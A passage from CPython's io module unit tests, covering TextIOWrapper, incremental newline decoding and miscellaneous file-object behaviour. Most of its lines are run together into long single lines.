2) self.assertEqual(buf.getvalue(), (data * 2).encode(encoding)) def test_unreadable(self): class UnReadable(self.BytesIO): def readable(self): return False txt = self.TextIOWrapper(UnReadable()) self.assertRaises(OSError, txt.read) def test_read_one_by_one(self): txt = self.TextIOWrapper(self.BytesIO(b"AA\r\nBB")) reads = "" while True: c = txt.read(1) if not c: break reads += c self.assertEqual(reads, "AA\nBB") def test_readlines(self): txt = self.TextIOWrapper(self.BytesIO(b"AA\nBB\nCC")) self.assertEqual(txt.readlines(), ["AA\n", "BB\n", "CC"]) txt.seek(0) self.assertEqual(txt.readlines(None), ["AA\n", "BB\n", "CC"]) txt.seek(0) self.assertEqual(txt.readlines(5), ["AA\n", "BB\n"]) # read in amounts equal to TextIOWrapper._CHUNK_SIZE which is 128. 
    def test_read_by_chunk(self):
        # Chunked reading: universal-newline translation must still collapse
        # a "\r\n" pair even when "\r" and "\n" land in different chunks.
        # make sure "\r\n" straddles 128 char boundary.
        txt = self.TextIOWrapper(self.BytesIO(b"A" * 127 + b"\r\nB"))
        reads = ""
        while True:
            c = txt.read(128)
            if not c:
                break
            reads += c
        self.assertEqual(reads, "A"*127+"\nB")

    def test_writelines(self):
        # writelines() concatenates the items verbatim — no separator added.
        l = ['ab', 'cd', 'ef']
        buf = self.BytesIO()
        txt = self.TextIOWrapper(buf)
        txt.writelines(l)
        txt.flush()
        self.assertEqual(buf.getvalue(), b'abcdef')

    def test_writelines_userlist(self):
        # writelines() accepts any iterable of str, not only a real list.
        l = UserList(['ab', 'cd', 'ef'])
        buf = self.BytesIO()
        txt = self.TextIOWrapper(buf)
        txt.writelines(l)
        txt.flush()
        self.assertEqual(buf.getvalue(), b'abcdef')

    def test_writelines_error(self):
        # Non-str items (ints, None, bytes) must raise TypeError.
        txt = self.TextIOWrapper(self.BytesIO())
        self.assertRaises(TypeError, txt.writelines, [1, 2, 3])
        self.assertRaises(TypeError, txt.writelines, None)
        self.assertRaises(TypeError, txt.writelines, b'abc')

    def test_issue1395_1(self):
        # Mixed-newline data must decode to the normalized form even when
        # read one character at a time.
        txt = self.TextIOWrapper(self.BytesIO(self.testdata), encoding="ascii")

        # read one char at a time
        reads = ""
        while True:
            c = txt.read(1)
            if not c:
                break
            reads += c
        self.assertEqual(reads, self.normalized)

    def test_issue1395_2(self):
        # Same data, 4 chars per read(), with a deliberately tiny chunk size
        # so newline pairs straddle internal chunk boundaries.
        txt = self.TextIOWrapper(self.BytesIO(self.testdata), encoding="ascii")
        txt._CHUNK_SIZE = 4

        reads = ""
        while True:
            c = txt.read(4)
            if not c:
                break
            reads += c
        self.assertEqual(reads, self.normalized)

    def test_issue1395_3(self):
        # Interleave read() and readline() under a tiny chunk size.
        txt = self.TextIOWrapper(self.BytesIO(self.testdata), encoding="ascii")
        txt._CHUNK_SIZE = 4

        reads = txt.read(4)
        reads += txt.read(4)
        reads += txt.readline()
        reads += txt.readline()
        reads += txt.readline()
        self.assertEqual(reads, self.normalized)

    def test_issue1395_4(self):
        # A partial read() followed by read-to-EOF must not lose data.
        txt = self.TextIOWrapper(self.BytesIO(self.testdata), encoding="ascii")
        txt._CHUNK_SIZE = 4

        reads = txt.read(4)
        reads += txt.read()
        self.assertEqual(reads, self.normalized)

    def test_issue1395_5(self):
        # Seeking away and back to a tell() cookie must not disturb the
        # decoder state mid-stream.
        txt = self.TextIOWrapper(self.BytesIO(self.testdata), encoding="ascii")
        txt._CHUNK_SIZE = 4

        reads = txt.read(4)
        pos = txt.tell()
        txt.seek(0)
        txt.seek(pos)
        self.assertEqual(txt.read(4),
"BBB\n") def test_issue2282(self): buffer = self.BytesIO(self.testdata) txt = self.TextIOWrapper(buffer, encoding="ascii") self.assertEqual(buffer.seekable(), txt.seekable()) def test_append_bom(self): # The BOM is not written again when appending to a non-empty file filename = os_helper.TESTFN for charset in ('utf-8-sig', 'utf-16', 'utf-32'): with self.open(filename, 'w', encoding=charset) as f: f.write('aaa') pos = f.tell() with self.open(filename, 'rb') as f: self.assertEqual(f.read(), 'aaa'.encode(charset)) with self.open(filename, 'a', encoding=charset) as f: f.write('xxx') with self.open(filename, 'rb') as f: self.assertEqual(f.read(), 'aaaxxx'.encode(charset)) def test_seek_bom(self): # Same test, but when seeking manually filename = os_helper.TESTFN for charset in ('utf-8-sig', 'utf-16', 'utf-32'): with self.open(filename, 'w', encoding=charset) as f: f.write('aaa') pos = f.tell() with self.open(filename, 'r+', encoding=charset) as f: f.seek(pos) f.write('zzz') f.seek(0) f.write('bbb') with self.open(filename, 'rb') as f: self.assertEqual(f.read(), 'bbbzzz'.encode(charset)) def test_seek_append_bom(self): # Same test, but first seek to the start and then to the end filename = os_helper.TESTFN for charset in ('utf-8-sig', 'utf-16', 'utf-32'): with self.open(filename, 'w', encoding=charset) as f: f.write('aaa') with self.open(filename, 'a', encoding=charset) as f: f.seek(0) f.seek(0, self.SEEK_END) f.write('xxx') with self.open(filename, 'rb') as f: self.assertEqual(f.read(), 'aaaxxx'.encode(charset)) def test_errors_property(self): with self.open(os_helper.TESTFN, "w") as f: self.assertEqual(f.errors, "strict") with self.open(os_helper.TESTFN, "w", errors="replace") as f: self.assertEqual(f.errors, "replace") @support.no_tracing def test_threads_write(self): # Issue6750: concurrent writes could duplicate data event = threading.Event() with self.open(os_helper.TESTFN, "w", buffering=1) as f: def run(n): text = "Thread%03d\n" % n event.wait() f.write(text) 
threads = [threading.Thread(target=run, args=(x,)) for x in range(20)] with threading_helper.start_threads(threads, event.set): time.sleep(0.02) with self.open(os_helper.TESTFN) as f: content = f.read() for n in range(20): self.assertEqual(content.count("Thread%03d\n" % n), 1) def test_flush_error_on_close(self): # Test that text file is closed despite failed flush # and that flush() is called before file closed. txt = self.TextIOWrapper(self.BytesIO(self.testdata), encoding="ascii") closed = [] def bad_flush(): closed[:] = [txt.closed, txt.buffer.closed] raise OSError() txt.flush = bad_flush self.assertRaises(OSError, txt.close) # exception not swallowed self.assertTrue(txt.closed) self.assertTrue(txt.buffer.closed) self.assertTrue(closed) # flush() called self.assertFalse(closed[0]) # flush() called before file closed self.assertFalse(closed[1]) txt.flush = lambda: None # break reference loop def test_close_error_on_close(self): buffer = self.BytesIO(self.testdata) def bad_flush(): raise OSError('flush') def bad_close(): raise OSError('close') buffer.close = bad_close txt = self.TextIOWrapper(buffer, encoding="ascii") txt.flush = bad_flush with self.assertRaises(OSError) as err: # exception not swallowed txt.close() self.assertEqual(err.exception.args, ('close',)) self.assertIsInstance(err.exception.__context__, OSError) self.assertEqual(err.exception.__context__.args, ('flush',)) self.assertFalse(txt.closed) # Silence destructor error buffer.close = lambda: None txt.flush = lambda: None def test_nonnormalized_close_error_on_close(self): # Issue #21677 buffer = self.BytesIO(self.testdata) def bad_flush(): raise non_existing_flush def bad_close(): raise non_existing_close buffer.close = bad_close txt = self.TextIOWrapper(buffer, encoding="ascii") txt.flush = bad_flush with self.assertRaises(NameError) as err: # exception not swallowed txt.close() self.assertIn('non_existing_close', str(err.exception)) self.assertIsInstance(err.exception.__context__, NameError) 
self.assertIn('non_existing_flush', str(err.exception.__context__)) self.assertFalse(txt.closed) # Silence destructor error buffer.close = lambda: None txt.flush = lambda: None def test_multi_close(self): txt = self.TextIOWrapper(self.BytesIO(self.testdata), encoding="ascii") txt.close() txt.close() txt.close() self.assertRaises(ValueError, txt.flush) def test_unseekable(self): txt = self.TextIOWrapper(self.MockUnseekableIO(self.testdata)) self.assertRaises(self.UnsupportedOperation, txt.tell) self.assertRaises(self.UnsupportedOperation, txt.seek, 0) def test_readonly_attributes(self): txt = self.TextIOWrapper(self.BytesIO(self.testdata), encoding="ascii") buf = self.BytesIO(self.testdata) with self.assertRaises(AttributeError): txt.buffer = buf def test_rawio(self): # Issue #12591: TextIOWrapper must work with raw I/O objects, so # that subprocess.Popen() can have the required unbuffered # semantics with universal_newlines=True. raw = self.MockRawIO([b'abc', b'def', b'ghi\njkl\nopq\n']) txt = self.TextIOWrapper(raw, encoding='ascii', newline='\n') # Reads self.assertEqual(txt.read(4), 'abcd') self.assertEqual(txt.readline(), 'efghi\n') self.assertEqual(list(txt), ['jkl\n', 'opq\n']) def test_rawio_write_through(self): # Issue #12591: with write_through=True, writes don't need a flush raw = self.MockRawIO([b'abc', b'def', b'ghi\njkl\nopq\n']) txt = self.TextIOWrapper(raw, encoding='ascii', newline='\n', write_through=True) txt.write('1') txt.write('23\n4') txt.write('5') self.assertEqual(b''.join(raw._write_stack), b'123\n45') def test_bufio_write_through(self): # Issue #21396: write_through=True doesn't force a flush() # on the underlying binary buffered object. 
flush_called, write_called = [], [] class BufferedWriter(self.BufferedWriter): def flush(self, *args, **kwargs): flush_called.append(True) return super().flush(*args, **kwargs) def write(self, *args, **kwargs): write_called.append(True) return super().write(*args, **kwargs) rawio = self.BytesIO() data = b"a" bufio = BufferedWriter(rawio, len(data)*2) textio = self.TextIOWrapper(bufio, encoding='ascii', write_through=True) # write to the buffered io but don't overflow the buffer text = data.decode('ascii') textio.write(text) # buffer.flush is not called with write_through=True self.assertFalse(flush_called) # buffer.write *is* called with write_through=True self.assertTrue(write_called) self.assertEqual(rawio.getvalue(), b"") # no flush write_called = [] # reset textio.write(text * 10) # total content is larger than bufio buffer self.assertTrue(write_called) self.assertEqual(rawio.getvalue(), data * 11) # all flushed def test_reconfigure_write_through(self): raw = self.MockRawIO([]) t = self.TextIOWrapper(raw, encoding='ascii', newline='\n') t.write('1') t.reconfigure(write_through=True) # implied flush self.assertEqual(t.write_through, True) self.assertEqual(b''.join(raw._write_stack), b'1') t.write('23') self.assertEqual(b''.join(raw._write_stack), b'123') t.reconfigure(write_through=False) self.assertEqual(t.write_through, False) t.write('45') t.flush() self.assertEqual(b''.join(raw._write_stack), b'12345') # Keeping default value t.reconfigure() t.reconfigure(write_through=None) self.assertEqual(t.write_through, False) t.reconfigure(write_through=True) t.reconfigure() t.reconfigure(write_through=None) self.assertEqual(t.write_through, True) def test_read_nonbytes(self): # Issue #17106 # Crash when underlying read() returns non-bytes t = self.TextIOWrapper(self.StringIO('a')) self.assertRaises(TypeError, t.read, 1) t = self.TextIOWrapper(self.StringIO('a')) self.assertRaises(TypeError, t.readline) t = self.TextIOWrapper(self.StringIO('a')) 
self.assertRaises(TypeError, t.read) def test_illegal_encoder(self): # Issue 31271: Calling write() while the return value of encoder's # encode() is invalid shouldn't cause an assertion failure. rot13 = codecs.lookup("rot13") with support.swap_attr(rot13, '_is_text_encoding', True): t = io.TextIOWrapper(io.BytesIO(b'foo'), encoding="rot13") self.assertRaises(TypeError, t.write, 'bar') def test_illegal_decoder(self): # Issue #17106 # Bypass the early encoding check added in issue 20404 def _make_illegal_wrapper(): quopri = codecs.lookup("quopri") quopri._is_text_encoding = True try: t = self.TextIOWrapper(self.BytesIO(b'aaaaaa'), newline='\n', encoding="quopri") finally: quopri._is_text_encoding = False return t # Crash when decoder returns non-string t = _make_illegal_wrapper() self.assertRaises(TypeError, t.read, 1) t = _make_illegal_wrapper() self.assertRaises(TypeError, t.readline) t = _make_illegal_wrapper() self.assertRaises(TypeError, t.read) # Issue 31243: calling read() while the return value of decoder's # getstate() is invalid should neither crash the interpreter nor # raise a SystemError. def _make_very_illegal_wrapper(getstate_ret_val): class BadDecoder: def getstate(self): return getstate_ret_val def _get_bad_decoder(dummy): return BadDecoder() quopri = codecs.lookup("quopri") with support.swap_attr(quopri, 'incrementaldecoder', _get_bad_decoder): return _make_illegal_wrapper() t = _make_very_illegal_wrapper(42) self.assertRaises(TypeError, t.read, 42) t = _make_very_illegal_wrapper(()) self.assertRaises(TypeError, t.read, 42) t = _make_very_illegal_wrapper((1, 2)) self.assertRaises(TypeError, t.read, 42) def _check_create_at_shutdown(self, **kwargs): # Issue #20037: creating a TextIOWrapper at shutdown # shouldn't crash the interpreter. 
iomod = self.io.__name__ code = """if 1: import codecs import {iomod} as io # Avoid looking up codecs at shutdown codecs.lookup('utf-8') class C: def __init__(self): self.buf = io.BytesIO() def __del__(self): io.TextIOWrapper(self.buf, **{kwargs}) print("ok") c = C() """.format(iomod=iomod, kwargs=kwargs) return assert_python_ok("-c", code) def test_create_at_shutdown_without_encoding(self): rc, out, err = self._check_create_at_shutdown() if err: # Can error out with a RuntimeError if the module state # isn't found. self.assertIn(self.shutdown_error, err.decode()) else: self.assertEqual("ok", out.decode().strip()) def test_create_at_shutdown_with_encoding(self): rc, out, err = self._check_create_at_shutdown(encoding='utf-8', errors='strict') self.assertFalse(err) self.assertEqual("ok", out.decode().strip()) def test_read_byteslike(self): r = MemviewBytesIO(b'Just some random string\n') t = self.TextIOWrapper(r, 'utf-8') # TextIOwrapper will not read the full string, because # we truncate it to a multiple of the native int size # so that we can construct a more complex memoryview. 
bytes_val = _to_memoryview(r.getvalue()).tobytes() self.assertEqual(t.read(200), bytes_val.decode('utf-8')) def test_issue22849(self): class F(object): def readable(self): return True def writable(self): return True def seekable(self): return True for i in range(10): try: self.TextIOWrapper(F(), encoding='utf-8') except Exception: pass F.tell = lambda x: 0 t = self.TextIOWrapper(F(), encoding='utf-8') def test_reconfigure_encoding_read(self): # latin1 -> utf8 # (latin1 can decode utf-8 encoded string) data = 'abc\xe9\n'.encode('latin1') + 'd\xe9f\n'.encode('utf8') raw = self.BytesIO(data) txt = self.TextIOWrapper(raw, encoding='latin1', newline='\n') self.assertEqual(txt.readline(), 'abc\xe9\n') with self.assertRaises(self.UnsupportedOperation): txt.reconfigure(encoding='utf-8') with self.assertRaises(self.UnsupportedOperation): txt.reconfigure(newline=None) def test_reconfigure_write_fromascii(self): # ascii has a specific encodefunc in the C implementation, # but utf-8-sig has not. Make sure that we get rid of the # cached encodefunc when we switch encoders. 
raw = self.BytesIO() txt = self.TextIOWrapper(raw, encoding='ascii', newline='\n') txt.write('foo\n') txt.reconfigure(encoding='utf-8-sig') txt.write('\xe9\n') txt.flush() self.assertEqual(raw.getvalue(), b'foo\n\xc3\xa9\n') def test_reconfigure_write(self): # latin -> utf8 raw = self.BytesIO() txt = self.TextIOWrapper(raw, encoding='latin1', newline='\n') txt.write('abc\xe9\n') txt.reconfigure(encoding='utf-8') self.assertEqual(raw.getvalue(), b'abc\xe9\n') txt.write('d\xe9f\n') txt.flush() self.assertEqual(raw.getvalue(), b'abc\xe9\nd\xc3\xa9f\n') # ascii -> utf-8-sig: ensure that no BOM is written in the middle of # the file raw = self.BytesIO() txt = self.TextIOWrapper(raw, encoding='ascii', newline='\n') txt.write('abc\n') txt.reconfigure(encoding='utf-8-sig') txt.write('d\xe9f\n') txt.flush() self.assertEqual(raw.getvalue(), b'abc\nd\xc3\xa9f\n') def test_reconfigure_write_non_seekable(self): raw = self.BytesIO() raw.seekable = lambda: False raw.seek = None txt = self.TextIOWrapper(raw, encoding='ascii', newline='\n') txt.write('abc\n') txt.reconfigure(encoding='utf-8-sig') txt.write('d\xe9f\n') txt.flush() # If the raw stream is not seekable, there'll be a BOM self.assertEqual(raw.getvalue(), b'abc\n\xef\xbb\xbfd\xc3\xa9f\n') def test_reconfigure_defaults(self): txt = self.TextIOWrapper(self.BytesIO(), 'ascii', 'replace', '\n') txt.reconfigure(encoding=None) self.assertEqual(txt.encoding, 'ascii') self.assertEqual(txt.errors, 'replace') txt.write('LF\n') txt.reconfigure(newline='\r\n') self.assertEqual(txt.encoding, 'ascii') self.assertEqual(txt.errors, 'replace') txt.reconfigure(errors='ignore') self.assertEqual(txt.encoding, 'ascii') self.assertEqual(txt.errors, 'ignore') txt.write('CRLF\n') txt.reconfigure(encoding='utf-8', newline=None) self.assertEqual(txt.errors, 'strict') txt.seek(0) self.assertEqual(txt.read(), 'LF\nCRLF\n') self.assertEqual(txt.detach().getvalue(), b'LF\nCRLF\r\n') def test_reconfigure_newline(self): raw = self.BytesIO(b'CR\rEOF') 
txt = self.TextIOWrapper(raw, 'ascii', newline='\n') txt.reconfigure(newline=None) self.assertEqual(txt.readline(), 'CR\n') raw = self.BytesIO(b'CR\rEOF') txt = self.TextIOWrapper(raw, 'ascii', newline='\n') txt.reconfigure(newline='') self.assertEqual(txt.readline(), 'CR\r') raw = self.BytesIO(b'CR\rLF\nEOF') txt = self.TextIOWrapper(raw, 'ascii', newline='\r') txt.reconfigure(newline='\n') self.assertEqual(txt.readline(), 'CR\rLF\n') raw = self.BytesIO(b'LF\nCR\rEOF') txt = self.TextIOWrapper(raw, 'ascii', newline='\n') txt.reconfigure(newline='\r') self.assertEqual(txt.readline(), 'LF\nCR\r') raw = self.BytesIO(b'CR\rCRLF\r\nEOF') txt = self.TextIOWrapper(raw, 'ascii', newline='\r') txt.reconfigure(newline='\r\n') self.assertEqual(txt.readline(), 'CR\rCRLF\r\n') txt = self.TextIOWrapper(self.BytesIO(), 'ascii', newline='\r') txt.reconfigure(newline=None) txt.write('linesep\n') txt.reconfigure(newline='') txt.write('LF\n') txt.reconfigure(newline='\n') txt.write('LF\n') txt.reconfigure(newline='\r') txt.write('CR\n') txt.reconfigure(newline='\r\n') txt.write('CRLF\n') expected = 'linesep' + os.linesep + 'LF\nLF\nCR\rCRLF\r\n' self.assertEqual(txt.detach().getvalue().decode('ascii'), expected) def test_issue25862(self): # Assertion failures occurred in tell() after read() and write(). 
        # (continuation of test_issue25862, whose def line precedes this
        # span) tell() after read(1) + read() must not trip an assertion.
        t = self.TextIOWrapper(self.BytesIO(b'test'), encoding='ascii')
        t.read(1)
        t.read()
        t.tell()
        # Likewise for tell() after a read followed by a write.
        t = self.TextIOWrapper(self.BytesIO(b'test'), encoding='ascii')
        t.read(1)
        t.write('x')
        t.tell()


class MemviewBytesIO(io.BytesIO):
    '''A BytesIO object whose read method returns memoryviews
    rather than bytes'''

    def read1(self, len_):
        return _to_memoryview(super().read1(len_))

    def read(self, len_):
        return _to_memoryview(super().read(len_))


def _to_memoryview(buf):
    '''Convert bytes-object *buf* to a non-trivial memoryview'''
    # Use an int array so the view's itemsize > 1; drop the tail bytes
    # that don't fill a whole item so frombytes() accepts the input.
    arr = array.array('i')
    idx = len(buf) - len(buf) % arr.itemsize
    arr.frombytes(buf[:idx])
    return memoryview(arr)


class CTextIOWrapperTest(TextIOWrapperTest):
    # Run the shared TextIOWrapperTest suite against the C implementation.
    io = io
    shutdown_error = "LookupError: unknown encoding: ascii"

    def test_initialization(self):
        # A failed re-__init__ (bad newline) must leave the wrapper unusable
        # rather than half-initialized.
        r = self.BytesIO(b"\xc3\xa9\n\n")
        b = self.BufferedReader(r, 1000)
        t = self.TextIOWrapper(b)
        self.assertRaises(ValueError, t.__init__, b, newline='xyzzy')
        self.assertRaises(ValueError, t.read)

        # repr() of a never-initialized instance must raise, not crash.
        t = self.TextIOWrapper.__new__(self.TextIOWrapper)
        self.assertRaises(Exception, repr, t)

    def test_garbage_collection(self):
        # C TextIOWrapper objects are collected, and collecting them flushes
        # all data to disk.
        # The Python version has __del__, so it ends in gc.garbage instead.
        with warnings_helper.check_warnings(('', ResourceWarning)):
            rawio = io.FileIO(os_helper.TESTFN, "wb")
            b = self.BufferedWriter(rawio)
            t = self.TextIOWrapper(b, encoding="ascii")
            t.write("456def")
            t.x = t  # reference cycle: only the GC can reclaim t
            wr = weakref.ref(t)
            del t
            support.gc_collect()
        self.assertIsNone(wr(), wr)
        # The data written before collection must have been flushed.
        with self.open(os_helper.TESTFN, "rb") as f:
            self.assertEqual(f.read(), b"456def")

    def test_rwpair_cleared_before_textio(self):
        # Issue 13070: TextIOWrapper's finalization would crash when called
        # after the reference to the underlying BufferedRWPair's writer got
        # cleared by the GC.
for i in range(1000): b1 = self.BufferedRWPair(self.MockRawIO(), self.MockRawIO()) t1 = self.TextIOWrapper(b1, encoding="ascii") b2 = self.BufferedRWPair(self.MockRawIO(), self.MockRawIO()) t2 = self.TextIOWrapper(b2, encoding="ascii") # circular references t1.buddy = t2 t2.buddy = t1 support.gc_collect() def test_del__CHUNK_SIZE_SystemError(self): t = self.TextIOWrapper(self.BytesIO(), encoding='ascii') with self.assertRaises(AttributeError): del t._CHUNK_SIZE class PyTextIOWrapperTest(TextIOWrapperTest): io = pyio shutdown_error = "LookupError: unknown encoding: ascii" class IncrementalNewlineDecoderTest(unittest.TestCase): def check_newline_decoding_utf8(self, decoder): # UTF-8 specific tests for a newline decoder def _check_decode(b, s, **kwargs): # We exercise getstate() / setstate() as well as decode() state = decoder.getstate() self.assertEqual(decoder.decode(b, **kwargs), s) decoder.setstate(state) self.assertEqual(decoder.decode(b, **kwargs), s) _check_decode(b'\xe8\xa2\x88', "\u8888") _check_decode(b'\xe8', "") _check_decode(b'\xa2', "") _check_decode(b'\x88', "\u8888") _check_decode(b'\xe8', "") _check_decode(b'\xa2', "") _check_decode(b'\x88', "\u8888") _check_decode(b'\xe8', "") self.assertRaises(UnicodeDecodeError, decoder.decode, b'', final=True) decoder.reset() _check_decode(b'\n', "\n") _check_decode(b'\r', "") _check_decode(b'', "\n", final=True) _check_decode(b'\r', "\n", final=True) _check_decode(b'\r', "") _check_decode(b'a', "\na") _check_decode(b'\r\r\n', "\n\n") _check_decode(b'\r', "") _check_decode(b'\r', "\n") _check_decode(b'\na', "\na") _check_decode(b'\xe8\xa2\x88\r\n', "\u8888\n") _check_decode(b'\xe8\xa2\x88', "\u8888") _check_decode(b'\n', "\n") _check_decode(b'\xe8\xa2\x88\r', "\u8888") _check_decode(b'\n', "\n") def check_newline_decoding(self, decoder, encoding): result = [] if encoding is not None: encoder = codecs.getincrementalencoder(encoding)() def _decode_bytewise(s): # Decode one byte at a time for b in encoder.encode(s): 
result.append(decoder.decode(bytes([b]))) else: encoder = None def _decode_bytewise(s): # Decode one char at a time for c in s: result.append(decoder.decode(c)) self.assertEqual(decoder.newlines, None) _decode_bytewise("abc\n\r") self.assertEqual(decoder.newlines, '\n') _decode_bytewise("\nabc") self.assertEqual(decoder.newlines, ('\n', '\r\n')) _decode_bytewise("abc\r") self.assertEqual(decoder.newlines, ('\n', '\r\n')) _decode_bytewise("abc") self.assertEqual(decoder.newlines, ('\r', '\n', '\r\n')) _decode_bytewise("abc\r") self.assertEqual("".join(result), "abc\n\nabcabc\nabcabc") decoder.reset() input = "abc" if encoder is not None: encoder.reset() input = encoder.encode(input) self.assertEqual(decoder.decode(input), "abc") self.assertEqual(decoder.newlines, None) def test_newline_decoder(self): encodings = ( # None meaning the IncrementalNewlineDecoder takes unicode input # rather than bytes input None, 'utf-8', 'latin-1', 'utf-16', 'utf-16-le', 'utf-16-be', 'utf-32', 'utf-32-le', 'utf-32-be', ) for enc in encodings: decoder = enc and codecs.getincrementaldecoder(enc)() decoder = self.IncrementalNewlineDecoder(decoder, translate=True) self.check_newline_decoding(decoder, enc) decoder = codecs.getincrementaldecoder("utf-8")() decoder = self.IncrementalNewlineDecoder(decoder, translate=True) self.check_newline_decoding_utf8(decoder) self.assertRaises(TypeError, decoder.setstate, 42) def test_newline_bytes(self): # Issue 5433: Excessive optimization in IncrementalNewlineDecoder def _check(dec): self.assertEqual(dec.newlines, None) self.assertEqual(dec.decode("\u0D00"), "\u0D00") self.assertEqual(dec.newlines, None) self.assertEqual(dec.decode("\u0A00"), "\u0A00") self.assertEqual(dec.newlines, None) dec = self.IncrementalNewlineDecoder(None, translate=False) _check(dec) dec = self.IncrementalNewlineDecoder(None, translate=True) _check(dec) def test_translate(self): # issue 35062 for translate in (-2, -1, 1, 2): decoder = codecs.getincrementaldecoder("utf-8")() 
decoder = self.IncrementalNewlineDecoder(decoder, translate) self.check_newline_decoding_utf8(decoder) decoder = codecs.getincrementaldecoder("utf-8")() decoder = self.IncrementalNewlineDecoder(decoder, translate=0) self.assertEqual(decoder.decode(b"\r\r\n"), "\r\r\n") class CIncrementalNewlineDecoderTest(IncrementalNewlineDecoderTest): pass class PyIncrementalNewlineDecoderTest(IncrementalNewlineDecoderTest): pass # XXX Tests for open() class MiscIOTest(unittest.TestCase): def tearDown(self): os_helper.unlink(os_helper.TESTFN) def test___all__(self): for name in self.io.__all__: obj = getattr(self.io, name, None) self.assertIsNotNone(obj, name) if name in ("open", "open_code"): continue elif "error" in name.lower() or name == "UnsupportedOperation": self.assertTrue(issubclass(obj, Exception), name) elif not name.startswith("SEEK_"): self.assertTrue(issubclass(obj, self.IOBase)) def test_attributes(self): f = self.open(os_helper.TESTFN, "wb", buffering=0) self.assertEqual(f.mode, "wb") f.close() with warnings_helper.check_warnings(('', DeprecationWarning)): f = self.open(os_helper.TESTFN, "U") self.assertEqual(f.name, os_helper.TESTFN) self.assertEqual(f.buffer.name, os_helper.TESTFN) self.assertEqual(f.buffer.raw.name, os_helper.TESTFN) self.assertEqual(f.mode, "U") self.assertEqual(f.buffer.mode, "rb") self.assertEqual(f.buffer.raw.mode, "rb") f.close() f = self.open(os_helper.TESTFN, "w+") self.assertEqual(f.mode, "w+") self.assertEqual(f.buffer.mode, "rb+") # Does it really matter? self.assertEqual(f.buffer.raw.mode, "rb+") g = self.open(f.fileno(), "wb", closefd=False) self.assertEqual(g.mode, "wb") self.assertEqual(g.raw.mode, "wb") self.assertEqual(g.name, f.fileno()) self.assertEqual(g.raw.name, f.fileno()) f.close() g.close() def test_open_pipe_with_append(self): # bpo-27805: Ignore ESPIPE from lseek() in open(). r, w = os.pipe() self.addCleanup(os.close, r) f = self.open(w, 'a') self.addCleanup(f.close) # Check that the file is marked non-seekable. 
On Windows, however, lseek # somehow succeeds on pipes. if sys.platform != 'win32': self.assertFalse(f.seekable()) def test_io_after_close(self): for kwargs in [ {"mode": "w"}, {"mode": "wb"}, {"mode": "w", "buffering": 1}, {"mode": "w", "buffering": 2}, {"mode": "wb", "buffering": 0}, {"mode": "r"}, {"mode": "rb"}, {"mode": "r", "buffering": 1}, {"mode": "r", "buffering": 2}, {"mode": "rb", "buffering": 0}, {"mode": "w+"}, {"mode": "w+b"}, {"mode": "w+", "buffering": 1}, {"mode": "w+", "buffering": 2}, {"mode": "w+b", "buffering": 0}, ]: f = self.open(os_helper.TESTFN, **kwargs) f.close() self.assertRaises(ValueError, f.flush) self.assertRaises(ValueError, f.fileno) self.assertRaises(ValueError, f.isatty) self.assertRaises(ValueError, f.__iter__) if hasattr(f, "peek"): self.assertRaises(ValueError, f.peek, 1) self.assertRaises(ValueError, f.read) if hasattr(f, "read1"): self.assertRaises(ValueError, f.read1, 1024) self.assertRaises(ValueError, f.read1) if hasattr(f, "readall"): self.assertRaises(ValueError, f.readall) if hasattr(f, "readinto"): self.assertRaises(ValueError, f.readinto, bytearray(1024)) if hasattr(f, "readinto1"): self.assertRaises(ValueError, f.readinto1, bytearray(1024)) self.assertRaises(ValueError, f.readline) self.assertRaises(ValueError, f.readlines) self.assertRaises(ValueError, f.readlines, 1) self.assertRaises(ValueError, f.seek, 0) self.assertRaises(ValueError, f.tell) self.assertRaises(ValueError, f.truncate) self.assertRaises(ValueError, f.write, b"" if "b" in kwargs['mode'] else "") self.assertRaises(ValueError, f.writelines, []) self.assertRaises(ValueError, next, f) def test_blockingioerror(self): # Various BlockingIOError issues class C(str): pass c = C("") b = self.BlockingIOError(1, c) c.b = b b.c = c wr = weakref.ref(c) del c, b support.gc_collect() self.assertIsNone(wr(), wr) def test_abcs(self): # Test the visible base classes are ABCs. 
self.assertIsInstance(self.IOBase, abc.ABCMeta) self.assertIsInstance(self.RawIOBase, abc.ABCMeta) self.assertIsInstance(self.BufferedIOBase, abc.ABCMeta) self.assertIsInstance(self.TextIOBase, abc.ABCMeta) def _check_abc_inheritance(self, abcmodule): with self.open(os_helper.TESTFN, "wb", buffering=0) as f: self.assertIsInstance(f, abcmodule.IOBase) self.assertIsInstance(f, abcmodule.RawIOBase) self.assertNotIsInstance(f, abcmodule.BufferedIOBase) self.assertNotIsInstance(f, abcmodule.TextIOBase) with self.open(os_helper.TESTFN, "wb") as f: self.assertIsInstance(f, abcmodule.IOBase) self.assertNotIsInstance(f, abcmodule.RawIOBase) self.assertIsInstance(f, abcmodule.BufferedIOBase) self.assertNotIsInstance(f, abcmodule.TextIOBase) with self.open(os_helper.TESTFN, "w") as f: self.assertIsInstance(f, abcmodule.IOBase) self.assertNotIsInstance(f, abcmodule.RawIOBase) self.assertNotIsInstance(f, abcmodule.BufferedIOBase) self.assertIsInstance(f, abcmodule.TextIOBase) def test_abc_inheritance(self): # Test implementations inherit from their respective ABCs self._check_abc_inheritance(self) def test_abc_inheritance_official(self): # Test implementations inherit from the official ABCs of the # baseline "io" module. 
self._check_abc_inheritance(io) def _check_warn_on_dealloc(self, *args, **kwargs): f = open(*args, **kwargs) r = repr(f) with self.assertWarns(ResourceWarning) as cm: f = None support.gc_collect() self.assertIn(r, str(cm.warning.args[0])) def test_warn_on_dealloc(self): self._check_warn_on_dealloc(os_helper.TESTFN, "wb", buffering=0) self._check_warn_on_dealloc(os_helper.TESTFN, "wb") self._check_warn_on_dealloc(os_helper.TESTFN, "w") def _check_warn_on_dealloc_fd(self, *args, **kwargs): fds = [] def cleanup_fds(): for fd in fds: try: os.close(fd) except OSError as e: if e.errno != errno.EBADF: raise self.addCleanup(cleanup_fds) r, w = os.pipe() fds += r, w self._check_warn_on_dealloc(r, *args, **kwargs) # When using closefd=False, there's no warning r, w = os.pipe() fds += r, w with warnings_helper.check_no_resource_warning(self): open(r, *args, closefd=False, **kwargs) def test_warn_on_dealloc_fd(self): self._check_warn_on_dealloc_fd("rb", buffering=0) self._check_warn_on_dealloc_fd("rb") self._check_warn_on_dealloc_fd("r") def test_pickling(self): # Pickling file objects is forbidden for kwargs in [ {"mode": "w"}, {"mode": "wb"}, {"mode": "wb", "buffering": 0}, {"mode": "r"}, {"mode": "rb"}, {"mode": "rb", "buffering": 0}, {"mode": "w+"}, {"mode": "w+b"}, {"mode": "w+b", "buffering": 0}, ]: for protocol in range(pickle.HIGHEST_PROTOCOL + 1): with 